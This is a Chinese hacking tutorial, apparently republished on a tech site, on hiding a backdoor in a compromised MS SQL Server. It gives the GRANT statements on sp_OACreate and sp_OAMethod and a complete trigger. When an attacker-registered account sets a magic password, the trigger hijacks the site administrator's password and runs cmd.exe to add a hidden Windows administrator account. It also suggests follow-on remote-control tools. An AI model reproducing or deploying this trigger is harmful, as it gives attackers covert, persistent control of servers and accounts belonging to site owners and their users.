基于SQL触发器的服务器后门

安全 黑客攻防
很多东西如果不经常去用,沉积在脑袋里的东西就会慢慢沉寂.这个手法很久以前就存在了.昨天写代码的时候不得不用到触发器实现某些功能,才想起来利用这个自从触发器功能被开发出来就存在的后门……

很多东西如果不经常去用,沉积在脑袋里的东西就会慢慢沉寂.这个手法很久以前就存在了.昨天写代码的时候不得不用到触发器实现某些功能,才想起来利用这个自从触发器功能被开发出来就存在的后门,mssql里其实可以放置很多后门,比如在sql里创建一个始终存在的远程连接之类,当然了,今天的题目是触发器,其他的暂且放在一边.

这个后门其实可用度极广,通常管理员会把主要精力放在查询系统用户,或者是否有黑客添加了sql用户等状态的查询上,然而对某些库的权限做出了改动,往往不是他们注意到的重点,我们利用的也正是这一点.

假设我已经拿到一台数据库服务器,这时我们当然可以对数据库完全操作,我们首先需要对master表里的某些我们需要使用的扩展存储过程作出修改,这里当然要先用SA身份来执行:

 

grant execute on master..sp_OACreate to guest
grant execute on master..sp_oamethod to guest

语句都很简单,仅仅是对sp_oamethod赋予guest组用户的执行权限,这里由于SQL的特殊机制(我这里是SQL2000 SP4),即使我们赋予了XP_CMDSHELL的执行权限,依然无法在普通用户下运行,若是打算使用,猜想应该要重新修改xplog70.dll并创建存储过程,这是大牛该做的事,与我们无关.暂且略过.

虽然网站和数据库分离的状况很常见,我们这里先说不分离的时候,我们拿到数据库服务器权限,这里当然可以随意查看网站代码,我以本机为环境给大家比较直观的展示.

存在一个admin表,是存放用户帐户的地方,当然了,可以是user或者其他表,只是给出一个演示,结构如下:

 

通常我们以自身的帐户登陆网站后,都会提供密码修改的服务,我们这里仅以这点来演示,其他方式可以根据实际情况自行研究.我假设我注册了一个用户名为hacker的用户(这里用户名越特殊越好,万一帐户被删除,别人抢注的几率也低),我想通过这里的密码修改来做一个系统后门,可以先在SQL创建一个触发器,内容如下:

CREATE TRIGGER [shell] ON [admin] 
for update
AS
DECLARE @password nvarchar(256)

select @password=password   FROM Inserted where username='hacker'
IF (@password='backdoor')
BEGIN
update admin set name=password,password='hacker' where username='admin'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec
sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user
huangzi huangzi /add & net localgroup administrators huangzi /add'
END

当用户名为hacker这个用户把密码修改为backdoor的时候(这里不要照猫画虎,我这里密码直接进的数据库没有经过加密,一般的网站代码会把密码经过加密再写进数据库,可能是md5或者其他加密手段,就需要修改一下了),实现2个功能:
1. 用户名为admin的用户原来的密码被保存在name字段里,而且新密码为hacker,这样我们就可以用管理员的帐户登陆进去,然后传shell或者做其他事,使用完毕以后再把密码修改回来,我们一开始就保存了原始密码,当然恢复起来很简单.这样的操作主要用于数据库和网站分离时,当然如果不分离的话,下面第2个功能实际上可以做更多的事

2.使用sp_oacreate和sp_oamethod创建一个新的用户名和密码皆为huangzi的管理员帐户,这里可以做许多变化,自行研究,这里仅仅是给出方法.
     
关于代码的部分基本已经陈述完毕,给出演示图感性认识一下:

我没有触发条件以前:

 

 

 

 

 

 随便修改下密码,但不触发条件:

 

 

 

 

 

接下来是把用户hacker的密码修改为backdoor,触发了条件

 

 

  

 

 

可以看到,管理员admin的原始密码被写进了name字段,现在的密码为hacker,更重要的是,系统用户已经添加进去了.

如果数据库和网站分离的话,可以上网的话比较好办,写下载者上远控或者端口转发出来.不可上网的话,我们之前修改了管理员的密码可以进后台看看有没有机会,当然了变化很多不是一时半会能讲完的,关键看环境,再决定手法.

【编辑推荐】

  1. 浅谈SQL Server触发器的使用
  2. 简析SQL Server 2005加强的十大安全举措
  3. 小心WEB狮木马窃取WEB服务器网络空间信息
  4. 思科表示IOS的FTP功能可成为黑客后门
责任编辑:佚名 来源: 黑客风云
相关推荐

2011-03-28 10:05:57

sql触发器代码

2009-04-07 13:56:03

SQL Server触发器实例

2010-10-20 14:34:48

SQL Server触

2011-05-20 14:06:25

Oracle触发器

2010-09-13 17:03:34

sql server触

2010-11-12 15:35:55

SQL Server约

2010-07-16 10:19:31

2011-03-03 09:30:24

downmoonsql登录触发器

2011-04-14 10:53:00

MySQLSQL触发器

2010-09-01 16:40:00

SQL删除触发器

2010-11-10 13:37:01

SQL Server触

2011-04-19 10:48:05

Oracle触发器

2021-08-05 07:28:27

SQL触发器结构

2010-10-22 11:10:43

SQL Server触

2010-11-08 11:49:24

SQL Server管

2010-07-06 14:47:03

SQL Server数

2011-05-19 14:29:49

Oracle触发器语法

2011-04-14 13:54:22

Oracle触发器

2010-05-31 18:06:07

MySQL 触发器

2010-10-12 10:04:15

MySQL触发器
点赞
收藏

51CTO技术栈公众号